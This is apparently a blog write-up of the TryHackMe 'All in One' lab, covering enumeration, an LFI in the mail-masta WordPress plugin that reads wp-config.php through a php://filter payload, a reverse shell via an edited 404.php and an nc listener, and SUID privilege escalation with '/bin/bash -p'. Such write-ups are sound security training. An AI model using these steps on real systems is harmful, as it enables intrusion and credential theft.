Open in app

Sign in

Write

Sign in

Try Hack Me!-ALL IN 1 Write up

ENUMERATION

Meraki_Sec
3 min readJan 13, 2021

SCANNING

Let’s begin with basic nmap scan,

nmap -A -T4 -p- <ip> -oN scan.nmap

NMAP scan.

FTP (PORT 21)

from the scan we now know that there are three ports open. We can see that ftp allows anonymous login so lets see if we can find something interesting.

you can use the following command to login to ftp,

ftp <ip>

looks like there is nothing in ftp.

PORT 80

Apache2 Default page.

Port 80 has Default Apache2 Default page.

let’s check if there is any hidden directories.

you can use any tools that you like as of now we are using gobuster.

command:

gobuster dir -u <url> -w <wordlists>

gobuster report

so now we know that there is a wordpress running.

source page

enumerating the wordpress page we know that there is user named elyana.

let’s brute force login.

brute force wp-login

hmm, Don’t waste much time on brute force because you never know if you could find the right password.

Lets try running WPScan and see if we can find something interesting,

WPScan report

oh, There is a mail-masta plugin version 1.0 which is vulnerable ,

EXPLOITATION

looking for exploit for the plugin we know that it is vulnerable to LFI(Local File Inclusion) vulnerability.

using PHP wrapper

lets try to get the config file.

you can use PHP wrapper.

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../wp-config.php

once you get the source code decode it using base64.

base64 -d <file>

source code config.php

since we got the password we can now login .

lets get the reverse shell by uploading a arbitrary code.

Arbitrary code upload

you can now set up the listener using netcat.

nc -nvlp <port>

how to access the file 404.php where we have uploaded the arbitrary code.

change the permalink settings to plain if the site is using any custom settings.

permalink settings.

you can now access the file by typing the following url,

http://server/?p=404.php

reverse shell.

PRIVILEGE ESCALATION

lets check if there is any possible way to privesc as www-data,

after looking for sometime we find that we can use suid permission to escalate privileges.

we can use find command to find files with suid permissions.

find / -perm -u=s -type f 2>/dev/null

find command results.

we can make use of bash to run the following command to escalate privileges.

/bin/bash -p

BoOM!!

we belong to root group.

Tryhackme
Learning

--

--

Meraki_Sec

Written by Meraki_Sec

0 Followers

help,learn,share.

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams